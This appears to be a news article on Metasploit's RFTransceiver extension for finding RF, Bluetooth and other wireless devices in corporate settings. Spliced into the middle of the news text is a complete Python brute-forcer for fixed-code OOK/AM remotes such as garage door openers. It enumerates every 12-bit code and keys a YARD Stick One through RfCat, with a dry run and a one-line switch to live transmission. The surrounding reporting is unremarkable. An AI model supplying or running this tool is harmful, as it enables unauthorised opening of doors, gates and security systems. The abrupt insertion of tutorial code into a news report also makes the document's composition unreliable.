Targeting Internet of Things: Metasploit Tool Adds Wireless Device Detection

Metasploit has added a feature to support scanning for wireless devices.

In-brief: The Metasploit Framework has a new extension to test for wireless devices that communicate over radio frequency (RF), Bluetooth and other protocols. 

In a nod to the growing presence of Internet of Things devices, Metasploit, everyone’s favorite penetration testing tool, has added support for an extension that will detect radio frequency (RF) devices, the company said on Tuesday.

The extension, dubbed RFTransceiver, allows Metasploit users to couple software-defined radios, RF transmitters and other equipment to the Metasploit Framework, so that security pros can generate and monitor radio frequency traffic and identify wireless systems deployed in a corporate environment.

Devices that communicate over radio protocols other than 802.11 Wi-Fi are becoming more and more common in homes and workplaces. The recent Mirai botnet attack has raised awareness of the security risk posed by low-value, unobtrusive connected devices such as Wi-Fi cameras.

Wireless devices that might lurk in corporate environments run the gamut from consumer accessories like wireless garage door openers and vehicle key fobs to RFID door card readers, wireless security systems, Zigbee-controlled lights, and HVAC systems, notes Craig Smith, the head of Transportation Research at Rapid7, which owns Metasploit. However, companies have limited options for monitoring such devices.

The RFTransceiver is designed to address that problem by letting Metasploit drive wireless testing and hacking tools from companies like Hak5. Initially, RFTransceiver will support the TI cc11xx Low-Power Sub-1GHz RF Transceiver, and there is an API that is compatible with the popular RfCat Python framework for the TI cc11xx chipsets. Testers would also need an RfCat-compatible testing device, like the YARD Stick One, Smith said. Out of the box there are two Metasploit modules: an amplitude modulation (AM) based brute-force tool (rfpwnon) and a generic transmitter (transmitter), the company said. Presumably, more modules will be added as community members embrace the new wireless testing capabilities of the Framework.
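To make the "AM-based brute-force" idea concrete, here is an added example of how such a tool is put together; it is illustrative code written for this article, not Rapid7's rfpwnon module or the RfCat project's code. A fixed-code remote (the kind set by DIP switches) is attacked by encoding every candidate code as an on-off-keyed (OOK) pulse-width pattern, packing it into a byte stream and keying the transmitter with it. The pulse-width scheme (`1` = three high symbols then one low, `0` = one high then three low, 32 silent symbols between frames), the 433.92 MHz frequency, the 2400 baud symbol rate and the 12-bit code width are assumptions for illustration and are not the encoding of any particular product. The only hardware-facing function uses calls that exist in the RfCat Python API (`RfCat`, `setFreq`, `setMdlModulation`, `setMdlDRate`, `setMaxPower`, `makePktFLEN`, `RFxmit`) and is imported lazily, so everything else runs offline with a dummy transmitter.

```python
"""
Added example for this article (not Rapid7's rfpwnon or the RfCat project's code):
brute-forcing a fixed-code OOK/AM remote.

Assumed pulse-width encoding (illustrative, not any vendor's real scheme):
  bit '1' -> symbols 1110    bit '0' -> symbols 1000    frame gap -> 32 zero symbols
Each symbol occupies one baud interval of the transmitter.
"""
from typing import Callable, Iterator, Tuple

ONE_SYMBOLS = "1110"       # assumed pattern for a 1 bit
ZERO_SYMBOLS = "1000"      # assumed pattern for a 0 bit
GAP_SYMBOLS = "0" * 32     # assumed inter-frame silence


def encode_code(code: int, bits: int) -> str:
    """Return the OOK symbol string ('1' = carrier on, '0' = off) for one code, MSB first."""
    if code < 0 or code >= (1 << bits):
        raise ValueError("code does not fit in the given bit width")
    symbols = [ONE_SYMBOLS if (code >> i) & 1 else ZERO_SYMBOLS
               for i in range(bits - 1, -1, -1)]
    return "".join(symbols) + GAP_SYMBOLS


def pack_symbols(symbols: str) -> bytes:
    """Pack a '0'/'1' symbol string into bytes, MSB first, zero-padding the last byte."""
    padded = symbols + "0" * (-len(symbols) % 8)
    return bytes(int(padded[i:i + 8], 2) for i in range(0, len(padded), 8))


def candidate_frames(bits: int) -> Iterator[Tuple[int, bytes]]:
    """Yield (code, packed OOK frame) for every code in the key space, in order."""
    for code in range(1 << bits):
        yield code, pack_symbols(encode_code(code, bits))


def brute_force(bits: int, transmit: Callable[[bytes], None], repeat: int = 3) -> int:
    """Send every candidate frame `repeat` times through `transmit`; return frames sent.

    Real receivers usually need a few repetitions of a frame before they accept it,
    hence the repeat count; with 12-bit codes that is 4096 * repeat frames.
    """
    sent = 0
    for _, frame in candidate_frames(bits):
        for _ in range(repeat):
            transmit(frame)
            sent += 1
    return sent


def rfcat_transmitter(freq_hz: int = 433_920_000, baud: int = 2400) -> Callable[[bytes], None]:
    """Build a transmit callback for a YARD Stick One (or other RfCat dongle).

    Only call this with a dongle attached and with authorisation to transmit on
    the chosen frequency. The rflib import is deferred so the rest of the module
    runs without the hardware or library present.
    """
    from rflib import RfCat, MOD_ASK_OOK  # RfCat Python API

    d = RfCat()
    d.setFreq(freq_hz)               # assumed target band: 433.92 MHz
    d.setMdlModulation(MOD_ASK_OOK)  # amplitude modulation: carrier on/off per symbol
    d.setMdlDRate(baud)              # one symbol per baud interval
    d.setMaxPower()

    def transmit(frame: bytes) -> None:
        d.makePktFLEN(len(frame))    # fixed-length packet of raw symbol bytes
        d.RFxmit(frame)

    return transmit


if __name__ == "__main__":
    # Dry run with a dummy transmitter: count frames instead of keying a radio.
    captured = []
    total = brute_force(12, captured.append, repeat=3)
    print(f"{total} frames generated, {len(set(captured))} distinct codes,"
          f" {len(captured[0])} bytes per frame")
```

Swapping `captured.append` for `rfcat_transmitter()` turns the dry run into a live transmission; the de Bruijn trick of overlapping codes to shorten the sweep, and the Metasploit module's own encoding and timing, are deliberately out of scope here. Any live run belongs in a shielded enclosure or on a frequency you are licensed to use.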

Canvassing and testing of wireless devices that communicate via Bluetooth, RF and other wireless protocols has been the province of specialized pentesting firms. More recently, startups such as Bastille Networks and Pwnie Express have come to market with a range of enterprise-focused wireless testing products that allow companies to identify rogue wireless devices in their environments.
